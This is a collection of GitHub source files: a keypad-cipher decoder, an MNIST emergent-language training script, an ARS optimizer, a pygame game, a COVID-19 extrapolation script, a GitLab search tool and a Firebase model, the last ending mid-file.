+{"seq_id":"36006113161","text":"#键盘密码解密\n\nchiper='999*666*88*2*777*33*6*999*4*444*777*555*333*777*444*33*66*3*7777'\nchiper=chiper.split('*')\t#用*隔开\n\nkeys=['1','2','3','4','5','6','7','8','9'] \t#有可能是q代表1,w代表2这种,修改这行即可\nvalues=[1,2,3,4,5,6,7,8,9]\ndicts=dict(zip(keys,values))\n\njiugongge=[' ','abc','def','ghi','jkl','mno','pqrs','tuv','wxyz']\nnew_dicts=dict(zip(values,jiugongge))\n\nfor i in range(len(chiper)):\n temp=dicts.get(chiper[i][0]) #temp=9,6,8,2....\n print(''.join(new_dicts[temp][len(chiper[i])-1]),end='') #先找到9对应的为wxyz,再根据999的个数取第len-1个","repo_name":"zss192/CTF-python-script","sub_path":"九键密码解密.py","file_name":"九键密码解密.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"42614057640","text":"#!/usr/bin/env python\nfrom __future__ import print_function\nimport argparse\n\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\n\nimport chainer\nimport chainer.functions as F\nimport chainer.links as L\nimport chainer.serializers as S\nfrom chainer import training\nfrom chainer.training import extensions\n\n# from links import communicator\nfrom links import world\n\nimport numpy as np\n\ntry:\n from tqdm import tqdm\nexcept:\n tqdm = list\n\nimport json\n\n\ndef generate(model, data, epoch=0, out='./', train=False, printer=False):\n prev_train = model.train\n model.train = False\n sentence_history, log_prob_history, canvas_history = model(\n data, generate=True)\n canvas_history = [c * 255 for c in canvas_history]\n true_image = data * 255\n model.train = prev_train\n\n def save_images(x, filename):\n x = np.array(x.tolist(), np.float32)\n width = x.shape[0]\n fig, ax = plt.subplots(1, width, figsize=(1 * width, 1)) # , dpi=20)\n for a in ax:\n a.set_xticklabels([])\n a.set_yticklabels([])\n\n for ai, xi in zip(ax.ravel(), x):\n ai.imshow(xi.reshape(28, 28), cmap='Greys_r')\n fig.savefig(filename)\n plt.clf()\n plt.close('all')\n\n save_images(true_image.data, out + str(train) + '_.png')\n if printer:\n print('save _.png')\n for i in range(model.n_turn):\n save_images(\n canvas_history[i], out + str(train) + '{}e_{}.png'.format(epoch, i))\n if printer:\n print('save {}.png'.format(i))\n for i in range(data.shape[0]):\n for log_prob_batch, word_batch_list in zip(\n log_prob_history, sentence_history):\n if printer:\n print(str(i) + \",\\t\",\n [int(word_batch[i]) for word_batch in word_batch_list],\n log_prob_batch[i])\n sentence_log = [[[[int(word_batch[i]) for word_batch in word_batch_list],\n float(log_prob_batch[i])]\n for log_prob_batch, word_batch_list\n in zip(log_prob_history, sentence_history)]\n for i in range(data.shape[0])]\n json_f = open(\n out + 'message.' + str(train) + '{}e.json'.format(epoch), 'w')\n json.dump(sentence_log, json_f)\n\n\ndef main():\n parser = argparse.ArgumentParser(description='Chainer example: MNIST')\n parser.add_argument('--batchsize', '-b', type=int, default=256,\n help='Number of images in each mini-batch')\n parser.add_argument('--epoch', '-e', type=int, default=15,\n help='Number of sweeps over the dataset to train')\n parser.add_argument('--gpu', '-g', type=int, default=-1,\n help='GPU ID (negative value indicates CPU)')\n parser.add_argument('--out', '-o', default='./result',\n help='Directory to output the result')\n parser.add_argument('--resume', '-r', default='',\n help='Resume the training from snapshot')\n\n parser.add_argument('--unit', '-u', type=int, default=64,\n help='Number of units')\n parser.add_argument('--image-unit', '-i', type=int, default=128,\n help='Number of middel units for image expression')\n\n parser.add_argument('--co-importance', '-importance', '-imp',\n type=float, default=0.,\n help='Coef. of importance loss')\n parser.add_argument('--co-orthogonal', '-orthogonal', '-ort',\n type=float, default=0.,\n help='Coef. of orthogonal loss')\n\n parser.add_argument('--word', '-w', type=int, default=3,\n help='Number of words in a message')\n parser.add_argument('--turn', '-t', type=int, default=3,\n help='Number of turns')\n parser.add_argument('--vocab', '-v', type=int, default=32,\n help='Number of words in vocab')\n\n parser.add_argument('--drop-ratio', '--dropout', type=float, default=0.1,\n help='dropout ratio')\n\n args = parser.parse_args()\n\n args.out = args.out.rstrip('/') + '/'\n\n import json\n print(json.dumps(args.__dict__, indent=2))\n\n print('')\n\n model = world.World(\n 28 * 28, args.image_unit, args.unit,\n n_vocab=args.vocab, n_word=args.word, n_turn=args.turn,\n drop_ratio=args.drop_ratio, co_importance=args.co_importance,\n co_orthogonal=args.co_orthogonal)\n\n if args.gpu >= 0:\n chainer.cuda.get_device(args.gpu).use() # Make a specified GPU current\n model.to_gpu() # Copy the model to the GPU\n\n # Setup an optimizer\n optimizer = chainer.optimizers.Adam()\n optimizer.setup(model)\n optimizer.add_hook(chainer.optimizer.GradientClipping(1.))\n # optimizer.add_hook(chainer.optimizer.WeightDecay(0.0001))\n\n # Load the MNIST dataset\n train, test = chainer.datasets.get_mnist(withlabel=False)\n print('# of train data:', len(train))\n print('# of test data:', len(test))\n\n import os\n if not os.path.isdir(args.out):\n if os.path.exists(args.out):\n print(args.out, 'exists as a file')\n exit()\n else:\n os.mkdir(args.out)\n\n batchsize = args.batchsize\n convert = chainer.dataset.convert.concat_examples\n log_report = extensions.LogReport()\n best_valid = 10000000.\n best_keep = 0\n print('start')\n for i_epoch in range(1, args.epoch + 1):\n n_iters = len(train) // batchsize\n permutation = np.random.permutation(len(train))\n accum_loss_data = 0.\n for i_iter in range(n_iters):\n ids = permutation[i_iter * batchsize:\n (i_iter + 1) * batchsize]\n batch = [train[idx] for idx in ids]\n batch = chainer.Variable(\n model.xp.array(convert(batch).tolist(), np.float32),\n volatile='auto')\n model.zerograds()\n loss = model(batch)\n loss.backward()\n optimizer.update()\n accum_loss_data += loss.data - model.sub_accum_loss\n del loss\n\n convert = chainer.dataset.convert.concat_examples\n d = convert(train[:50])\n d = chainer.Variable(\n model.xp.array(d.tolist(), np.float32), volatile='auto')\n generate(model, d, epoch=i_epoch, out=args.out, train=True,\n printer=(i_epoch == args.epoch - 1))\n\n d = convert(test[:50])\n d = chainer.Variable(\n model.xp.array(d.tolist(), np.float32), volatile='auto')\n generate(model, d, epoch=i_epoch, out=args.out, train=False,\n printer=(i_epoch == args.epoch - 1))\n del d\n\n print(i_epoch, 'loss :', accum_loss_data / n_iters)\n mean_valid_loss_data = evaluate(model, test, batchsize, convert)\n\n if mean_valid_loss_data < best_valid:\n best_valid = mean_valid_loss_data\n best_keep = 0\n S.save_npz(args.out + 'saved_model.model', model)\n print(i_epoch, 'valid:', mean_valid_loss_data, '*')\n else:\n best_keep += 1\n print(i_epoch, 'valid:', mean_valid_loss_data)\n if best_keep >= 10:\n break\n\n #S.save_npz(args.out + 'saved_model.model', model)\n print('Finish at {}/{} epoch'.format(i_epoch, args.epoch))\n\n\ndef evaluate(model, test, batchsize, convert):\n\n model.train = False\n accum_valid_loss_data = 0.\n\n for i_iter in range(len(test) // batchsize + 1):\n ids = [i_iter * batchsize + idx for idx in range(batchsize)]\n ids = [idx for idx in ids if idx < len(test)]\n batch = [test[idx]\n for idx in ids if idx < len(test)]\n if not batch:\n continue\n batch = chainer.Variable(\n model.xp.array(convert(batch).tolist(), np.float32),\n volatile='auto')\n valid_loss_data = model(batch).data\n valid_loss_data -= model.sub_accum_loss\n accum_valid_loss_data += valid_loss_data * len(ids)\n\n model.train = True\n\n return accum_valid_loss_data / len(test)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"soskek/emergence_of_language_using_discrete_sequences","sub_path":"scripts/train_mnist.py","file_name":"train_mnist.py","file_ext":"py","file_size_in_byte":8184,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"75189559413","text":"import json\nimport logging\nimport os\nimport time\nfrom typing import Any, Union # for type hinting\nimport argparse # for type hinting\n\nimport numpy as np\nfrom numpy.random import PCG64DXSM, Generator\n\nfrom marco_polo.optimizers.uber_es.modules.opt import ESTeamWrapper as Base_TeamWrapper\nfrom marco_polo.optimizers.uber_es.modules.opt import StepStats\nfrom marco_polo.tools.stats import compute_weighted_sum\n\nfrom marco_polo.optimizers.ARS.modules.result_objects import (\n POResult,\n) # for type hinting\nfrom marco_polo.optimizers.ARS.modules.filter import Filter # for type hinting\nfrom marco_polo.tools.types import FloatArray, Role, PathString # for type hinting\nfrom marco_polo.tools.wrappers import TeamHistory # for type hinting\nfrom marco_polo.tools.iotools import NumpyDecoder\n\n\nlogger = logging.getLogger(__name__)\n\n\n################################################################################\n## Aux Objects\n################################################################################\n\n\n################################################################################\n## Main Class\n################################################################################\nclass ESTeamWrapper(Base_TeamWrapper):\n \"\"\"Wrapper for the optimizers that apply to a given team\n\n By default, the neural network models of all agents are updated by\n the methods in this class. However, a set of roles can be marked\n as 'frozen' to prevent the agents from being updated. This can be\n done via the parameter file using the key uber_es.freeze.\n Alternatively, the list of frozen roles can be changed later\n (see add_freeze(), remove_freeze(), and remove_all_freeze())\n \"\"\"\n\n def __init__(self, args: argparse.Namespace, team: TeamHistory) -> None:\n \"\"\"ES Team Wrapper for ARS Optimizer\n\n Parameters\n ----------\n args : argparse.Namespace\n Input arguments to parameterize Team and Optimizer\n team : TeamHistory\n Team of agents\n\n Returns\n -------\n None\n \"\"\"\n self.team = team\n self.args = args\n\n # see if freeze key is in args\n try:\n self._freeze = set(args.uber_es[\"freeze\"])\n except (AttributeError, KeyError):\n self._freeze = set()\n\n # build optimizer dict\n self.optimizers = {}\n for role in team.roles():\n self.optimizers[role] = ARS(args=args)\n\n def combine_and_update(\n self,\n step_results: list[dict[Role, POResult]],\n step_t_start: float,\n decay_noise: bool = False,\n propose_only: bool = False,\n ) -> dict[Role, StepStats]:\n \"\"\"Combine results from rollouts, pass to the optimizer, and update models.\n\n Agents with roles that are listed in the freeze set will have the statistics\n calculated but will not have their models updated.\n\n Parameters\n ----------\n step_results : list[dict[Role, POResult]]\n Results from runs\n step_t_start : float\n Time when this set of steps started (used for calculating runtime)\n decay_noise : bool, default=True\n Whether to have the applied noise decay during the optimization\n propose_only : bool, default=False\n If true, only the stats will be calculated and no updates will be made\n\n Return\n ------\n dict[Role, StepStats]\n Statistics from the runs for each role\n \"\"\"\n # return dict\n # organize by agent key\n stats = dict()\n\n # loop over agents, update their network\n for role in self.team.roles():\n # grab sim results for this agent\n results = [r[role] for r in step_results]\n\n # freeze is implemented by using propose_only\n if role in self._freeze:\n _propose_only = True\n else:\n _propose_only = propose_only\n\n # calculate stats and new theta\n new_theta, stats[role] = self.optimizers[role].combine_steps(\n step_results=results,\n theta=self.team[role].theta,\n obs_filt=self.team[role].get_obs_filt(),\n step_t_start=step_t_start,\n propose_only=_propose_only,\n )\n\n # update agent\n if not _propose_only:\n self.team[role].update_theta(new_theta=new_theta)\n self.team[role].set_model_params(model_params=new_theta)\n # obs_filt was updated in-place\n self.team[role].get_obs_filt().update_stats()\n self.team[role].get_obs_buf().reset() # should be redundent\n\n # return results\n return stats\n\n\n################################################################################\n## Optimization Controller\n################################################################################\nclass ARS:\n \"\"\"\n Augmented Random Search\n\n Algorithm V2-t from https://arxiv.org/abs/1803.07055\n \"\"\"\n\n def __init__(self, args: argparse.Namespace) -> None:\n \"\"\"\n\n\n Parameters\n ----------\n args : argparse.Namespace\n Input arguments\n\n\n Side-Effects\n ------------\n Yes\n Sets class attributes\n\n Return\n ------\n None\n \"\"\"\n #\n self.alpha = args.ARS[\"learning_rate\"] # learning-rate/step-size\n self.noise_std = args.ARS[\"noise_std\"] # std deviation of the exploration noise\n\n # check top fraction to keep, then convert to int for use\n assert args.ARS[\"top_frac\"] <= 1, \"top_frac must be <= 1\"\n assert args.ARS[\"top_frac\"] >= 0, \"top_frac must be >= 0\"\n self.top_frac = args.ARS[\"top_frac\"]\n self.top_n = int(\n round(\n args.ARS[\"top_frac\"]\n * args.uber_es[\"optim_jobs\"]\n * args.uber_es[\"rollouts_per_optim_job\"]\n )\n )\n\n def __str__(self) -> str:\n return \"ARS Optimization Controller\"\n\n def checkpoint(self, folder: PathString, role: Role) -> None:\n \"\"\"Save ARS Optimizer to Disk\n\n Parameters\n ----------\n folder : PathString\n Directory to store output\n role : Role\n Agent role for file naming\n\n Side-Effects\n ------------\n None\n\n Return\n ------\n None\n Saves output to disk\n \"\"\"\n with open(\n os.path.join(folder, f\"{role}_opt.json\"), mode=\"w\", encoding=\"utf-8\"\n ) as f:\n json.dump(self.__dict__, f)\n\n def reload(self, folder: PathString, role: Role) -> None:\n \"\"\"Load ARS Optimizer From Disk\n\n Parameters\n ----------\n folder : PathString\n Directory to read input\n role : Role\n Agent role for file naming\n\n Side-Effects\n ------------\n Yes\n Sets optimizer attributes\n\n Return\n ------\n None\n \"\"\"\n with open(\n os.path.join(folder, f\"{role}_opt.json\"), mode=\"r\", encoding=\"utf-8\"\n ) as f:\n self.__dict__ = json.load(f, cls=NumpyDecoder)\n\n def get_noise(self, seed: int, theta_len: int) -> FloatArray:\n \"\"\"Generate Random Noise for Gradient Estimation\n\n This function generates exploratory noise for simulation rollouts.\n The noise follows a standard normal distribution.\n\n Parameters\n ----------\n seed : int\n Initial value for the random generator.\n theta_len : int\n How many random numbers to return\n\n Side-Effects\n ------------\n None\n\n Return\n ------\n FloatArray\n Array of random floats of length theta\n \"\"\"\n # set random state\n random_state = Generator(PCG64DXSM(seed=seed))\n # draw normal distribution\n return random_state.normal(scale=self.noise_std, size=theta_len)\n\n def calc_max_min_theta(\n self, noise_seeds: FloatArray, returns: FloatArray, theta: FloatArray\n ) -> tuple[FloatArray, FloatArray]:\n \"\"\"\n Holdover from the original POET Code\n\n Poet calculated max/min theta values after the update, but differently from\n how it actually calculates the gradient. I'm separating it out, adding a min,\n and then keeping it for historic purposes only.\n\n Parameters\n ----------\n noise_seeds : FloatArray\n Array of seed values used to generate the random noise\n returns : FloatArray\n Rewards values from the simulation rollouts\n theta : FloatArray\n Current parameterization of the model\n\n Side-Effects\n ------------\n None\n\n Returns\n -------\n tuple[FloatArray, FloatArray]\n Min/Max point estimates of network parameterizations\n \"\"\"\n # used for both\n theta_len = len(theta)\n retList: list[FloatArray] = []\n\n # loop over max/min\n for i in range(0, 2):\n # setup\n pos_row, neg_row = (\n returns.argmax(axis=0) if (i == 0) else returns.argmin(axis=0)\n )\n noise_sign = 1.0\n noise_seed = noise_seeds[pos_row]\n\n # check\n if returns[pos_row, 0] < returns[neg_row, 1]:\n noise_sign = -1.0\n noise_seed = noise_seeds[neg_row]\n\n # calculate\n retList.append(\n theta\n + noise_sign * self.get_noise(seed=noise_seed, theta_len=theta_len)\n )\n\n return retList[0], retList[1]\n\n def combine_steps(\n self,\n step_results: list[POResult],\n theta: FloatArray,\n obs_filt: Filter,\n step_t_start: float,\n propose_only: bool = False,\n ) -> tuple[FloatArray, StepStats]:\n \"\"\"Calculate Statistics from All Simulation Rollouts\n\n If \"propose_only\" is true, then only statistics are calculated but no\n updates are performed.\n\n\n Parameters\n ----------\n step_results : list[POResult]\n Results from the simulation rollouts\n theta : FloatArray\n Current network parameterization\n obs_filt : Filter\n The model observation filter\n step_t_start : float\n Time that this calculation started\n propose_only : bool, default=False\n Do updates or only calculate statistics?\n\n Side-Effects\n ------------\n Yes\n Updates the observation filter for the model\n\n Returns\n -------\n tuple[FloatArray, StepStats]\n Tuple containing the new network parameterization and statistics from\n the simulations\n \"\"\"\n # constants\n theta_len = len(theta)\n\n # Extract results\n nList = []\n rList = []\n lList = []\n oList = []\n for r in step_results:\n nList.append(r.noise_inds)\n rList.append(r.returns)\n lList.append(r.lengths)\n oList.append(r.obs_buf)\n\n # reshape results\n noise_inds = np.concatenate(nList)\n po_returns = np.concatenate(rList)\n po_lengths = np.concatenate(lList)\n po_obs = np.concatenate(oList)\n\n # sort and subset results\n # get max of +/- rollouts\n # partition top n - idk why the \"-\" in the kth position\n # grab just the top n\n top_n_idx = po_returns.max(axis=1).argpartition(kth=-self.top_n)[-self.top_n :]\n\n noise_inds = noise_inds[top_n_idx]\n po_returns = po_returns[top_n_idx, :]\n po_lengths = po_lengths[top_n_idx]\n po_obs = po_obs[top_n_idx]\n\n # get max/min possible grads\n # has to be after subsetting results, but before theta update\n po_theta_max, po_theta_min = self.calc_max_min_theta(\n noise_seeds=noise_inds, returns=po_returns, theta=theta\n )\n\n # calculate gradients and update theta\n ret_std = po_returns.std()\n w_sum, _ = compute_weighted_sum(\n weights=(po_returns[:, 0] - po_returns[:, 1]) / ret_std,\n vec_generator=(\n self.get_noise(seed=seed, theta_len=theta_len) for seed in noise_inds\n ),\n theta_size=theta_len,\n )\n\n # Calculate gradient\n grads = w_sum * self.alpha / self.top_n # need for logging\n\n # are we updating?\n if not propose_only:\n # update theta\n theta += grads\n\n # update observations\n for obs in po_obs:\n obs_filt.update(other=obs)\n\n # grab final time\n step_t_end = time.time()\n\n # return new theta and stats\n return theta, StepStats(\n po_returns_mean=po_returns.mean(),\n po_returns_median=np.median(po_returns),\n po_returns_std=po_returns.std(),\n po_returns_max=po_returns.max(),\n po_theta_max=po_theta_max,\n po_returns_min=po_returns.min(),\n po_len_mean=po_lengths.mean(),\n po_len_std=po_lengths.std(),\n noise_std=self.noise_std,\n learning_rate=self.alpha,\n theta_norm=np.square(theta).sum(),\n grad_norm=float(np.square(grads).sum()),\n update_ratio=float(0.0),\n episodes_this_step=self.top_n,\n timesteps_this_step=po_lengths.sum(),\n time_elapsed_this_step=step_t_end - step_t_start,\n )\n","repo_name":"act3-ace/marcopolo","sub_path":"marco_polo/optimizers/ARS/modules/opt.py","file_name":"opt.py","file_ext":"py","file_size_in_byte":13614,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"1476379909","text":"from os import getcwd\nimport pygame\nimport gf\nfrom os import getcwd\nfrom car import Car\nfrom speedline import Speedline\nfrom road import Background\n\n\nclass Settings():\n\n def __init__(self):\n\n self.res = (1280, 720)\n\n self.FPS = 60\n\n self.sound = getcwd()+\"\\\\music\\\\strange.mp3\"\n self.start_sound = getcwd()+\"\\\\music\\\\start.mp3\"\n\n self.chords_lines = [\n #left side (from bottom to mid)\n [-240, 720], [0, 530], [120, 520], [240, 510], [360, 500], [480, 480], [620, 470],\n #right side (from mid to bottom)\n [660, 470], [800, 480], [920, 500], [1040, 510], [1160, 520], [1280, 530], [1520, 720]\n ]\n\n self.chords_lines2 = [\n #left side (from bottom to mid)\n [0, 720], [320, 560], [380, 540], [440, 520], [500, 500], [560, 480], [620, 470],\n #right side (from mid to bottom)\n [660, 470], [700, 480], [780, 500], [840, 520], [900, 540], [960, 560], [1280, 720]\n ]\n\n self.chords_bg = [\n (0, 360), (1280, 360), (1280, 720), (0, 720)\n ]\n\n self.color_bg = (150,0,150)\n self.color_rd = (0,0,0)\n self.color_imitate_speed = (45,45,45,196)\n\nclass app(Settings):\n\n g_set = Settings()\n\n def __init__(self):\n pygame.init()\n self.screen = pygame.display.set_mode(self.g_set.res, pygame.HWSURFACE|pygame.DOUBLEBUF)\n\n self.clock = pygame.time.Clock()\n self.game = False\n\n def prepare_first_frame(self):\n pygame.mixer.music.load(self.g_set.start_sound)\n pygame.mixer.music.play()\n\n self.start_im = pygame.image.load(getcwd()+\"\\\\images\\\\mid.png\").convert()\n self.im_rect = self.start_im.get_rect()\n\n path = pygame.font.match_font('times new roman', True, True)\n font = pygame.font.Font(path, 72)\n\n return font\n\n def prepare_main_frame(self):\n\n self.car = Car(self.screen)\n self.bg = Background(self.screen, self.g_set.color_bg,\n self.g_set.color_rd, self.g_set.chords_lines,\n self.g_set.chords_lines2\n )\n\n def run(self):\n\n if not self.game:\n self.first_frame()\n if self.game:\n self.main_frame()\n\n def first_frame(self):\n tmp = 10\n color = [0, 0, 0]\n font = self.prepare_first_frame()\n\n text = font.render('W a n g a n M i d n i g h t', 50, color)\n font_rect = text.get_rect()\n\n font_rect.centerx, font_rect.centery = 640, 240\n\n while not self.game:\n self.screen.fill((0,0,0))\n self.screen.blit(self.start_im, self.im_rect)\n\n gf.check_events()\n\n keys = pygame.key.get_pressed()\n\n if keys[pygame.K_SPACE]:\n self.im_rect.x -= 50\n font_rect.x += 50\n\n text = font.render('W a n g a n M i d n i g h t', 50, color)\n\n if color[0] > 200: tmp = -10\n if color[0] < 50: tmp = 10\n\n for i in range(len(color)): color[i] += tmp\n\n self.screen.blit(text, font_rect)\n pygame.display.update()\n\n self.clock.tick(self.g_set.FPS)\n\n if font_rect.x > 1280:\n pygame.mixer.music.load(self.g_set.sound)\n pygame.mixer.music.play()\n self.game = True\n\n def main_frame(self):\n\n self.prepare_main_frame()\n chord_x = self.g_set.chords_lines[6][0]\n chord_y = self.g_set.chords_lines[6][1]\n lines = []\n\n while True:\n\n self.clock.tick(self.g_set.FPS)\n\n gf.check_events()\n\n keys = pygame.key.get_pressed()\n move = gf.check_going(keys)\n gf.check_car_turning(keys, self.car)\n\n self.bg.draw_background()\n\n gf.append_l(self.screen, lines, self.g_set.color_imitate_speed,\n self.g_set.res, chord_y, move)\n\n [line.draw_lines() for line in lines.copy()]\n\n gf.imitate_speed(lines, move)\n\n self.car.blitme()\n\n pygame.display.update()\n","repo_name":"Tr0ub1e/Wangan-Midnight","sub_path":"settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":4337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32955117854","text":"import argparse\nimport csv\nimport datetime\nimport numpy\nimport sys\n\ndtypes = {\n 'caso.csv': [\n ('date', 'U10'),\n ('state', 'U2'),\n ('city', 'S128'),\n ('place_type','U8'),\n ('confirmed', int),\n ('deaths', int),\n ('order_for_place', int),\n ('is_last', 'U5'),\n ('estimated_population_2019', int),\n ('city_ibge_code', int),\n ('confirmed_per_100k_inhabitants', 'U32'),\n ('death_rate', 'U32')\n ]\n}\n\n\ndef cities_data(data):\n sorted_data = numpy.sort(data, order=('city', 'state'))\n\n current_city = sorted_data[0]['city']\n current_index = 0\n\n for i, entry in enumerate(sorted_data):\n if current_city != entry['city']:\n yield sorted_data[current_index:i]\n current_index = i\n current_city = entry['city']\n\n\ndef load_data(input):\n with open(input, 'r') as df:\n dtype = dtypes.get(input.split('/')[-1])\n\n if dtype:\n converters = { i: lambda x: x or 0 for i in range(len(dtype))}\n else:\n converters = 0\n\n return numpy.loadtxt(df, dtype=dtype, delimiter=',', skiprows=1, converters=converters)\n\n\ndef extrapolate_city_data(city_data, field='confirmed', prior=5, after=14, order=1):\n daystamps = [\n int(datetime.datetime.strptime(day['date'], '%Y-%m-%d').timestamp() / (24 * 3600))\n for day in city_data\n ]\n\n if len(city_data[field]) < prior:\n # not enough data\n return [], []\n\n fit = numpy.polyfit(daystamps[-prior:], city_data[field][-prior:], order)\n p = numpy.poly1d(fit)\n\n latest_date = max(daystamps)\n extra_data = [max(0, int(p(latest_date + i))) for i in range(1, after + 1)]\n utc_timestamp = lambda i: ((latest_date + i) * 24 * 3600) + 10800 # BRT +3h = UTC\n extra_days = [datetime.datetime.fromtimestamp(utc_timestamp(i)).strftime('%Y-%m-%d') for i in range(1, after + 1)]\n\n return extra_days, extra_data\n\n\ndef extrapolate(data, prior=5, after=14, order=2):\n\n extrapolated = []\n\n for city_data in cities_data(data):\n state = city_data[0]['state']\n city = city_data[0]['city']\n place_type = city_data[0]['place_type']\n order_for_place = city_data[0]['order_for_place']\n estimated_population_2019 = city_data[0]['estimated_population_2019'] or 1\n city_ibge_code = city_data[0]['city_ibge_code']\n is_last = False\n extrapolation = True\n\n days, confirmed = extrapolate_city_data(city_data, field='confirmed', prior=prior, after=after, order=order)\n days, deaths = extrapolate_city_data(city_data, field='deaths', prior=prior, after=after, order=order)\n\n if not days or not confirmed or not deaths:\n continue\n\n data = [\n (\n days[i], state, city.decode('latin-1'), place_type, confirmed[i], deaths[i], order_for_place,\n is_last, estimated_population_2019, city_ibge_code,\n confirmed[i] / (estimated_population_2019 / 100000), deaths[i] / confirmed[i] if confirmed[i] else 0\n )\n for i in range(after)\n ]\n\n extrapolated += data\n\n return extrapolated\n\n\ndef save(data, header_names, file_name):\n\n with open(file_name, 'w+') as f:\n writer = csv.writer(f)\n\n writer.writerow(header_names)\n for row in data:\n writer.writerow(row)\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(description='Extrapolate covid-19 data')\n parser.add_argument('input')\n parser.add_argument('output')\n parser.add_argument('--prior', type=int, default=14)\n parser.add_argument('--after', type=int, default=14)\n parser.add_argument('--order', type=int, default=2)\n\n return parser.parse_args()\n\nif __name__ == \"__main__\":\n args = parse_args()\n data = load_data(args.input)\n e = extrapolate(data, args.prior, args.after, args.order)\n save(e, data.dtype.names, args.output)\n","repo_name":"dpereira/es-covid19-br","sub_path":"extrapolation/extrapolate.py","file_name":"extrapolate.py","file_ext":"py","file_size_in_byte":3953,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"21"} +{"seq_id":"337945009","text":"#!/usr/bin/python3\nimport gitlab\nimport sys\nimport argparse\nimport re\n\ndef eprint(*args, **kwargs):\n # https://stackoverflow.com/a/14981125\n print(*args, file=sys.stderr, **kwargs)\n\ndef search(gitlab_server, token, file_filter, text, group=None, project_filter=None, api_debug=False, internal_debug=False, filename_regex=False):\n return_value = []\n \n gl = gitlab.Gitlab(gitlab_server, private_token=token)\n if api_debug:\n gl.enable_debug()\n\n filter_groups = not (group == '' or group==None)\n filter_projects = not (project_filter == '' or project_filter==None)\n\n if not filter_groups and not filter_projects:\n projects = gl.projects.list(all=True)\n else:\n group_object = gl.groups.get(group)\n projects = []\n\n if filter_projects:\n group_projects = group_object.projects.list(search=project_filter, include_subgroups=True)\n else:\n group_projects = group_object.projects.list(all=True, include_subgroups=True)\n \n for group_project in group_projects:\n projects.append(gl.projects.get(group_project.id))\n\n if internal_debug:\n eprint(\"Number of projects that will be searched:\", len(projects))\n\n\n for project in projects:\n if internal_debug:\n if hasattr(project, 'path'):\n path = project.path\n else:\n path = project.name\n eprint(\"Project: \",path)\n\n files = []\n try:\n files = project.repository_tree(recursive=True, all=True)\n except Exception as e:\n print(str(e), \"Error getting tree in project:\", project.name)\n\n for file in files:\n if internal_debug:\n fpath = file.get('path',None) if file.get('path',None)!=None else file.get('name',None)\n eprint(\" File: \",fpath)\n\n if filename_regex:\n matches=re.findall(file_filter, file['name'])\n filename_matches = len(matches)>0\n else:\n filename_matches=file_filter == file['name']\n \n if filename_matches:\n file_content = project.files.raw(file_path=file['path'], ref='master')\n \n if text in str(file_content):\n return_value.append({\n \"project\": project.name,\n \"file\": file['path']\n })\n \n return return_value\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--api-debug\", action=\"store_true\", help=\"Show all API calls\")\n parser.add_argument(\"--internal-debug\", action=\"store_true\", help=\"Show all iterated items and other dubugv info\")\n parser.add_argument(\"--filename-is-regex\",action=\"store_true\", help=\"FILE_FILTER become Python regular expressions, so it can be '.*\\.cpp' to search for all files with extension cpp\")\n parser.add_argument(\"GITLAB_SERVER\", nargs=1, help=\"URL of Gitlab server, eg. https://gitlab.com/\")\n parser.add_argument(\"GITLAB_USER_TOKEN\", nargs=1, help=\"Access token with api_read access\")\n parser.add_argument(\"FILE_FILTER\", nargs=1, help=\"Filter for filenames to search in\")\n parser.add_argument(\"TEXT_TO_SEARCH\", nargs=1, help=\"Text to find in files\")\n parser.add_argument(\"GROUP\", nargs='?', help=\"Group to search for projects in, can be subgroup eg. parent_group/subgroup/another_subgroup\")\n parser.add_argument(\"PROJECT_FILTER\", nargs='?', help=\"Filter for project names to look into\")\n args = parser.parse_args()\n\n api_debug_arg = args.api_debug\n internal_debug_arg = args.internal_debug\n regex_arg = args.filename_is_regex\n gitlab_server_arg = args.GITLAB_SERVER[0]\n token_arg = args.GITLAB_USER_TOKEN[0]\n file_filter_arg = args.FILE_FILTER[0]\n text_arg = args.TEXT_TO_SEARCH[0]\n group_arg = None if args.GROUP == None else args.GROUP\n project_filter_arg = None if args.PROJECT_FILTER == None else args.PROJECT_FILTER\n\n print(search(gitlab_server_arg, token_arg, file_filter_arg, text_arg, group_arg, project_filter_arg, api_debug_arg, internal_debug_arg, regex_arg))\n","repo_name":"danielskowronski/gitlab-search","sub_path":"gitlab-search.py","file_name":"gitlab-search.py","file_ext":"py","file_size_in_byte":4326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"5138675202","text":"# pylint: disable=no-member\nfrom server.firebase import db, firestore\n\n\nclass Post:\n \"Post model class\"\n\n def __init__(self, pid: str = None) -> None:\n self.doc = db.collection(\"posts\").document(pid)\n\n @staticmethod\n def get_posts_by_user_id(\n uid: str = \"\", cursor=\"\", language: str = \"\", limit: int = 10\n ):\n \"Retrieve all posts created by a user id\"\n posts = db.collection(\"posts\")\n\n # Filter by user id\n if uid:\n posts = posts.where(\"user.uid\", \"==\", uid)\n\n # Filter by code language\n if language:\n posts = posts.where(\"language\", \"==\", language)\n\n # Sort by created at\n posts = posts.order_by(\"created\", direction=firestore.Query.DESCENDING)\n\n # Set the page offset\n if cursor:\n pagination_doc = db.collection(\"posts\").document(cursor).get()\n posts = posts.start_after(pagination_doc)\n\n posts = posts.limit(limit).stream()\n return [post.to_dict() for post in posts]\n\n @staticmethod\n def get_saved_posts_by_user_id(uid: str, cursor=None, limit: int = 10):\n \"Retrieve all posts saved by a user id\"\n posts = db.collection(\"user_posts\").document(uid).collection(\"saved\")\n # Set the page offset\n if cursor:\n pagination_doc = (\n db.collection(\"user_posts\")\n .document(uid)\n .collection(\"saved\")\n .document(cursor)\n .get()\n )\n posts = posts.start_after(pagination_doc)\n\n posts = posts.limit(limit).stream()\n return [post.to_dict() for post in posts]\n\n def get(self):\n \"Get a post document\"\n return self.doc.get()\n\n def update(self, data: 